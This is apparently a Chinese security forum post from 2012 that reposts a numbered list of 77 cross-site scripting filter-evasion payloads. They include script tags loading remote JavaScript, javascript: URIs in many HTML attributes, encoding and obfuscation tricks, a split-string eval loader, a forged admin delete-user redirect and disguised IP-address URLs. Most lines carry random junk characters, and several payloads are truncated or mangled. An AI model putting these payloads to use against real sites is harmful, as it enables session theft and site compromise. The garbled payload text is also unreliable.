貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
1 q6 J# U2 b3 j6 v @: j0 K$ E$ k* U3 o3 ]6 a1 ?2 z
(1)普通的XSS JavaScript注入2 t, U) y% e! @9 U$ o
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: I, `" n, z; T% N! h
* [! `% t5 P. b1 n+ x5 u4 o (2)IMG标签XSS使用JavaScript命令
% R$ q$ q% G7 I <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. E: N) v" T: r
+ O6 L6 I, O& u8 \- p (3)IMG标签无分号无引号* Q) q4 N! z( ^6 l! J4 n7 }, u+ E3 r
<IMG SRC=javascript:alert(‘XSS’)>
# I) r) d# j+ S7 Y* l% @/ n5 \4 x1 _8 P6 Y& r8 J; ]5 q
(4)IMG标签大小写不敏感
8 R5 F! [: z' v7 J3 H3 v <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; N; }; Q, z) a' N: K# y
. o6 o/ n* z0 n7 p" o; i (5)HTML编码(必须有分号)
( k3 t- K9 b) {7 m <IMG SRC=javascript:alert(“XSS”)>: E* T3 c2 T+ m6 a
0 t! o* B4 l6 P: B* S3 I
(6)修正缺陷IMG标签
, ~3 H5 I: }/ A' b! h <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ {: S) s t- G% j4 t; `$ K0 u7 Z1 F
& x) B$ C6 z" }: M) f9 z9 x, ~1 W (7)formCharCode标签(计算器)
0 L% S# I0 A- X, z <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
8 q2 U; G+ Z4 Q5 E' J1 a) L4 `+ j+ O. n6 ]& ?; s: S
(8)UTF-8的Unicode编码(计算器)- t4 }3 l6 z# f2 P2 k
<IMG SRC=jav..省略..S')>
6 S) d! d3 Z( `( C
( L! X5 I4 R. Q& B/ o$ s; O (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! n9 B% k3 O/ O m/ a <IMG SRC=jav..省略..S')>
. y4 D* M" C$ H h- Z* G$ p/ L
3 b+ e# L6 M- @* I (10)十六进制编码也是没有分号(计算器)
1 u3 A) p( Z [9 i <IMG SRC=java..省略..XSS')> L8 s7 D- n: H( _2 {
: ^4 ]. {; d' b6 N; g/ d (11)嵌入式标签,将Javascript分开, |9 M0 X/ j3 t$ ]0 F, D, O
<IMG SRC=”jav ascript:alert(‘XSS’);”>& Q/ O; B" b7 A3 [7 N& F" W! l5 b0 i8 |
* \% a x9 r+ ^% V
(12)嵌入式编码标签,将Javascript分开
# ~, S) T; u- R5 R" U2 P/ X: y) l V <IMG SRC=”jav ascript:alert(‘XSS’);”>: M8 k' V3 @8 X3 M8 a* s1 _ z
/ W/ M' C0 `5 e' W9 `% N
(13)嵌入式换行符
3 ?5 u2 S3 N# N. V1 @ <IMG SRC=”jav ascript:alert(‘XSS’);”>1 u. D0 d; S) ]1 a+ y
+ v9 j) \( a% P. }7 E% C6 A
(14)嵌入式回车
$ ^0 a2 E" y/ h$ [0 } <IMG SRC=”jav ascript:alert(‘XSS’);”>
* I# w& X8 x: A0 a0 p4 F9 a$ {, D; s% d W" a0 X$ r Y9 G
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
8 {8 n t9 p9 _2 i <IMG SRC=”javascript:alert(‘XSS‘)”>
5 G0 o7 L! I: ]2 A& g
) R! Z; z% x7 i! r0 { (16)解决限制字符(要求同页面)
; w6 \ ?- g+ i9 Y7 ?& k <script>z=’document.’</script>
6 _4 F2 W9 b, |# _ O0 g/ z1 o <script>z=z+’write(“‘</script>: `' v; E7 r- R! E& L: Q6 V
<script>z=z+’<script’</script>- L7 m) ~2 Z- }
<script>z=z+’ src=ht’</script>
0 ]. C6 U5 U6 Z2 r( n0 U$ q9 a <script>z=z+’tp://ww’</script>
8 u! D. b' X ^* N <script>z=z+’w.shell’</script>2 v, K h2 t" R+ ~
<script>z=z+’.net/1.’</script>
2 S" o9 K" C/ |! l0 D# M) `8 f <script>z=z+’js></sc’</script>" w, n& G- p/ V* ]8 _
<script>z=z+’ript>”)’</script>
4 ~* E2 u$ N& |8 M5 } <script>eval_r(z)</script>: r% D9 F; Z" x
+ }8 F. K, z4 f; w l( q (17)空字符
$ |. _8 `& @. d. o. u( K perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ }2 ]0 Y8 j$ r/ ^5 X
" e2 s8 O% _$ J+ o+ ]& |
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: F' z: v; _1 [& }8 E( \. c
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 @3 [& N ]( w7 q: L$ Q5 g; N' C; l4 `- ]5 }
(19)Spaces和meta前的IMG标签; I/ n/ d0 k) L9 s$ T7 c
<IMG SRC=” � javascript:alert(‘XSS’);”>
/ t/ ^3 q% b# K4 Z# V
: m/ Q9 `9 _# Q) ?2 |/ |2 i( y (20)Non-alpha-non-digit XSS3 A7 Q& E5 N2 H" t% k
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ j0 i6 r4 j. U. J2 N
" \3 a7 M+ k3 ~0 h4 K (21)Non-alpha-non-digit XSS to 2$ \ ?( d0 h) e6 K' A
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# D% m( p2 f9 p$ V* w V& Y& w* v! P7 o6 x4 I1 u7 L
(22)Non-alpha-non-digit XSS to 3
, C' `: Y, B- x/ c. b/ ^ <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 }# ] L0 L) E- n1 E
/ G# z Q, ~: C3 X9 Y (23)双开括号
) J; b @3 A1 H <<SCRIPT>alert(“XSS”);//<</SCRIPT>
5 h( ]3 w- D* y! f& E. b) @+ L ]; t9 ?0 x8 ~* Q5 O# Q
(24)无结束脚本标记(仅火狐等浏览器)+ b3 B g/ Z4 P
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
0 c/ t6 c8 u) J Y }8 ~. G- `1 ^ O, |
(25)无结束脚本标记2/ p5 j+ v! r$ v8 M3 P! ]' j4 f
<SCRIPT SRC=//3w.org/XSS/xss.js>
& {8 }# O7 B: y O( W
2 J- _) G- W- V) }& s0 ~ (26)半开的HTML/JavaScript XSS
* m' f& b& i# U3 t) ~+ [# R <IMG SRC=”javascript:alert(‘XSS’)”/ O- c8 x3 D* ` U' L
6 [4 C0 i$ l. }) i. ^ (27)双开角括号7 H+ f- \8 H( [
<iframe src=http://3w.org/XSS.html <' U$ Z7 c2 |* r
3 e- c4 M# Z9 N! p$ ]+ M (28)无单引号 双引号 分号 C) U4 d/ L, U% d) g
<SCRIPT>a=/XSS/
! w: Y$ U' d8 R" v2 k# @ alert(a.source)</SCRIPT>7 U8 r1 ?: n$ H+ M3 ?" e
% A, H4 p4 y9 G5 p3 Y A: k/ P6 d4 r
(29)换码过滤的JavaScript
, z3 [0 y- ]1 B N \”;alert(‘XSS’);//
3 ]# _" ?0 h V7 z4 W0 j; ^! {, j' Q, m- E1 V
(30)结束Title标签
! i+ v* h, t+ N' ` </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& b2 d5 \$ ?0 `
' o" a) R0 K* T4 z5 D; L (31)Input Image( s1 F8 @% Y( B, Y; k0 F! | q) z
<INPUT SRC=”javascript:alert(‘XSS’);”>
- p& r% n' ] g; T, o
( w7 ]9 ]" w, W, }# l2 O (32)BODY Image) c; `6 {% N/ ~' M2 G
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>% n5 }, T) [% [
2 E3 i' }+ b, k1 J
(33)BODY标签
! Q) b) R2 J" K: R <BODY(‘XSS’)>
3 O3 |; w# u5 L3 w- N
+ g- ~- B7 [+ O, b n# J8 w, a; t (34)IMG Dynsrc
5 J& `4 ?* j" p9 V, I, y <IMG DYNSRC=”javascript:alert(‘XSS’)”>
, B" m$ M& c, E" F* M! t. M
8 ?1 [3 ?: C. M: T8 v N (35)IMG Lowsrc
; N' \! \: S& \ y1 T; g <IMG LOWSRC=”javascript:alert(‘XSS’)”>
+ u+ K! r s8 s- v, x/ p5 S* i+ r3 p3 \$ u* ?6 S
(36)BGSOUND1 O" e$ y9 l' ]# K$ ` M
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 G. y! ?4 ^* Q' A* Z6 j- l1 B+ y9 ^$ K" n7 u
(37)STYLE sheet% l3 q" n" y7 q8 z7 R
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' ]: y1 J; T9 Y
( Q! w) r! @" I% {, g% L, A9 O; p
(38)远程样式表- D% `6 M* ^* y4 P. ^6 ]1 _3 Z
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 M, E6 E- K {: }6 h1 K2 {
4 Q; e. U5 V* ^" f# Z (39)List-style-image(列表式)
; e+ I8 V# q; q& b <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS! u3 T% M( y, X8 g* q
; _- i: }8 }! g5 V* C8 ? (40)IMG VBscript b# ]# {% Y7 `! Q! u& L! t) l
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 i' x, T, J0 \8 t! T8 f
; o7 k6 v7 d, ? (41)META链接url+ B$ C6 k; t+ x k! v
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>( v# d8 C& m1 o/ C; L0 x
* A" O( W y$ Z4 _$ k (42)Iframe
! l g: F& h. ?# H& @( v0 ^8 O3 r <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>% b! [. j" Y0 W7 B
+ ~+ |& R/ a4 e5 \3 j/ \
(43)Frame
: _9 W* j) H% d4 g4 N2 @0 }8 g5 S <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>. _1 `& l- I4 [! [
4 K+ J Z9 @5 @1 f* f: k (44)Table/ C, r5 ]* d& F. `4 [; E1 N
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- t9 L. m" n# b9 c- A9 L0 @' ^/ P, y0 [ C5 K7 [% R
(45)TD
, K2 j. N% w6 ?( Y; o: A. p <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>7 h0 e3 z' {4 a8 _4 A
" [/ a1 [" D8 ]9 u* S
(46)DIV background-image+ X b% j" |8 V( _9 M, {, B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ l1 t4 g4 N9 t# i% ^, Q5 C1 }) T( ], ~ ~: u8 X$ ?6 w
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279): t% P) H% D0 u; H* a5 |* F- ]
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
0 D- ~& Y" w* k' V ~' b- T9 V4 W2 q! y3 X. j
(48)DIV expression7 i. b+ x8 `; G C8 W, `
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>1 x# j5 t8 f5 q; H7 ^) E7 y
( O- c4 C4 ^2 n' P
(49)STYLE属性分拆表达
4 J$ L: V9 ^- h* G5 C1 J! N <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 T+ I: Y3 h( g; B- V2 E
- D0 s$ P U, J$ t/ `8 } (50)匿名STYLE(组成:开角号和一个字母开头)
+ f' K7 H6 _0 a& c! S! y <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* ~9 R U7 y# p; _* g1 s1 j& l0 Q. K
5 o! }8 Z5 y) m& v+ l9 @4 h2 I$ p* t% b
(51)STYLE background-image& h @/ j; K) h4 P; `( Z
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>4 M( c; C4 j, p9 K0 O- O+ Y5 o
% ]8 S: A2 A( f) m; n
(52)IMG STYLE方式
: k+ ]! V/ |6 l exppression(alert(“XSS”))’>
- ?* b) V& c' c# S( n' A* C- l" ~7 s6 o8 k( g: d6 c; P! E, c
(53)STYLE background) G7 i3 ~5 W. h6 f! T; s$ H b* H0 N
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 p. n6 B9 S& z& k/ n6 y
' m7 m$ ]8 Q- [4 k (54)BASE
7 v# X& i2 g% q <BASE HREF=”javascript:alert(‘XSS’);//”>, m( J/ `, }8 z* w0 b1 L$ z
' v3 ^' X: w% w0 h' J8 W7 I( c5 ]# n
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ Z4 H' B; ]) a' U" ]
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ V7 r4 U: { ]% \. i3 u( r
. ?/ U3 k ]4 _8 T& ]4 E) [9 Z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
$ S$ F. _# o5 C s a=”get”; f3 x7 Z: E& ]% y
b=”URL(\”";
# r9 a! M$ l4 P" N/ d8 i; K6 q; e c=”javascript:”;5 Y9 D3 @, H3 M5 ^) i
d=”alert(‘XSS’);\”)”;
" ]+ \+ f6 D6 @6 J( Z9 r. g: K eval_r(a+b+c+d);2 V3 u% E. I) D& Z# V
3 }+ S+ ]" q# e, d& b7 u$ b5 C, J( u (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上/ |! ^4 p) a$ _+ T8 L( H3 H
<HTML xmlns:xss>
l7 ^" {- Y7 N/ e0 X7 w+ Q0 J3 f& s5 n <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 d; R. Y1 T' u. R <xss:xss>XSS</xss:xss>
* U$ j! S0 p$ p' y8 Y </HTML>
Q6 X; l1 H7 J( Z2 w/ M4 N; y, q- A; J4 b! F
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, r: B! |5 s' D4 y6 g" s! J <SCRIPT SRC=””></SCRIPT>
, O' D) N" |3 V* p% X
' V+ K+ Y. A: g3 B# U' l; ^" G# ` (59)IMG嵌入式命令,可执行任意命令% t8 H$ p$ ?8 E' C% r2 t2 \- ?
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
5 a9 H9 W* d0 g q" E/ g4 r0 g; K3 u- u
(60)IMG嵌入式命令(a.jpg在同服务器)6 J" k- U6 q+ B$ Z( Z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
/ Y$ l" |7 k3 v# ?! c# ^+ t" d7 t" Y1 @# N: e7 o" s/ m6 q
(61)绕符号过滤
" Z0 y9 X( t' n, m0 ~5 S/ _ <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT> {6 B$ t- _6 N- k; o# t% b% y. W7 R
$ Z& Y- u/ d! ~ (62)) m( W+ Z3 n8 x+ P" L: E V8 X8 r
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 D' P+ n( x) ^3 ^
9 _2 O& Q4 g, [6 i; z& q- e0 I
(63)
! t' P; j( l+ W+ M0 L <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 Y$ ^3 g% J. v g
, b2 V2 I) b6 L, g1 c% {* C! a (64)
9 C6 K, ^6 U5 A% g7 C$ ? <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) a! _. y m+ `. }1 g+ f& A, u1 n
) [- U" s/ c) j2 s7 @9 y (65)
' b4 Y" |4 q+ H* j, ^& { <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ s" d g6 c$ c s7 v& p& j' f
+ G# _& b0 b; h Q; z
(66)
- G5 p0 T. I6 C <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 C7 V, m# G6 I
$ \5 n/ l, ^6 x" ~7 x (67) n& S2 u; \! O) @7 m
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 p! _; q9 u: V {1 p- g- E- W$ R( n4 l P S; m7 J9 n
(68)URL绕行) Y- Y; d0 E' H4 D2 X
<A HREF=”http://127.0.0.1/”>XSS</A>
% v/ w$ p3 Z5 M
" P+ a9 E @7 h. p (69)URL编码: d% ?0 `" l8 v: V( V3 |
<A HREF=”http://3w.org”>XSS</A>
/ Z, i! B. S3 x" W- H+ g1 S% p3 V5 x
(70)IP十进制
, t+ ~+ {0 M+ ]) N: \. b <A HREF=”http://3232235521″>XSS</A>! _7 o( E0 ]8 n3 `5 P& r
/ U# n$ a0 U2 \/ \& M
(71)IP十六进制
, E$ V5 t; R4 o P( K/ w <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
; N0 v4 H! j9 b- }( [2 J* K- t$ L
(72)IP八进制
* ^# B6 d4 f( v# G5 { A' f <A HREF=”http://0300.0250.0000.0001″>XSS</A>
5 ^4 ]0 f5 C5 I/ I+ x" G
9 B+ \* ~. ]$ D0 T8 ? (73)混合编码0 h, F' r" x3 ?/ G% L$ U% Q
<A HREF=”h
" C8 f, u) z6 ?: J: W tt p://6 6.000146.0×7.147/”">XSS</A>( b+ m; N% c6 v; _
* A( p ?1 ?. R( C) Q! Z- [* Z (74)节省[http:]
; H4 Q0 i" n" b7 s <A HREF=”//www.google.com/”>XSS</A>( \6 j. e& Y d+ O+ j
7 T. x N5 p4 V# Y* G1 J (75)节省[www]
# f0 X) d6 ?( k) i& [ <A HREF=”http://google.com/”>XSS</A>
& O6 U3 f6 v+ p$ U0 z# H0 n' `" w/ W) `) Q% L
(76)绝对点绝对DNS
$ c0 J; P; `- K( V: ]$ _( y( T <A HREF=”http://www.google.com./”>XSS</A>
* | F7 {, l7 H% f$ a
5 \$ L4 U8 y3 Q& k; G' x5 U( l (77)javascript链接7 A) Y, p! k( d2 g2 C& Q `: r; P
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对